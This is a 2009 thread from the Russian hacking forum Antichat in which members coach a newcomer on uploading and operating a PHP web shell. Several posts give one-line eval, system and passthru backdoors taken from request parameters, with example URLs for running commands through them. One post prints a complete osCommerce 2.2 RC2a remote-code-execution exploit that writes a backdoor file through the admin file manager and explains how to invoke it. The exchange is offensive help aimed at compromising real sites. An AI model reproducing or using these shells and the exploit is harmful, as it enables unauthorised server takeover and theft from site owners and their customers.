HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10061  
Старый 12.11.2009, 15:06
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами: 9419426

Репутация: 648
По умолчанию

Цитата:
Сообщение от sideup  
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.

Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>

Последний раз редактировалось Root-access; 19.01.2010 в 18:31.. Причина: опечатка
 
Ответить с цитированием

  #10062  
Старый 12.11.2009, 15:09
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
#10081
 
Ответить с цитированием

  #10063  
Старый 12.11.2009, 15:10
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
С нами: 9519229

Репутация: 0
По умолчанию

Цитата:
Сообщение от L I G A  
переметру cmd передавай пых код
Если не трудно можно пример такого запроса для:

pwd;ls -l
 
Ответить с цитированием

  #10064  
Старый 12.11.2009, 15:13
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Если не трудно можно пример такого запроса для:

pwd;ls -l
в случае с eval() то shell.php?cmd=system(ls -la);
 
Ответить с цитированием

  #10065  
Старый 12.11.2009, 15:13
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
С нами: 9519229

Репутация: 0
По умолчанию

Цитата:
Сообщение от Aртем  
печальный вопрос
Код:
<?system($_GET[cmd])?> 
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>
и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН
Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично
 
Ответить с цитированием

  #10066  
Старый 12.11.2009, 15:14
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Не работает из этого ничего.

<?php phpinfo(); ?> работает отлично
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.
 
Ответить с цитированием

  #10067  
Старый 12.11.2009, 15:20
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
С нами: 9519229

Репутация: 0
По умолчанию

Цитата:
Сообщение от Aртем  
ты как бы вопрос там видел? нет? я повторю:
через что ты заливаешь шелл?
[a] - SQL инъекция
[b] - PHP инъкция
[c] - Через какой-нибудь файловый менеджер.
Вот отсюда взял

http://www.milw0rm.com/exploits/9556
 
Ответить с цитированием

  #10068  
Старый 12.11.2009, 15:25
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами: 8717851

Репутация: 90
По умолчанию

хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
PHP код:
<?php
print_r
('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
'
);
$host ='domain.com';
$path '/';
$admin_path 'admin/';
$shellcode "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd fsockopen($host,'80');
if(!
$fd)
{
    echo 
'[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo (
"[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]
 
Ответить с цитированием

  #10069  
Старый 12.11.2009, 15:26
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
С нами: 9519229

Репутация: 0
По умолчанию

Цитата:
Сообщение от Aртем  
в случае с eval() то shell.php?cmd=system(ls -la);

Не работает
 
Ответить с цитированием

  #10070  
Старый 12.11.2009, 15:33
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Aртем  
я его чуть-чуть подправил...
Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!

=====================
sideup

Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:

shell.php?ev=phpinfo();

=======================
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.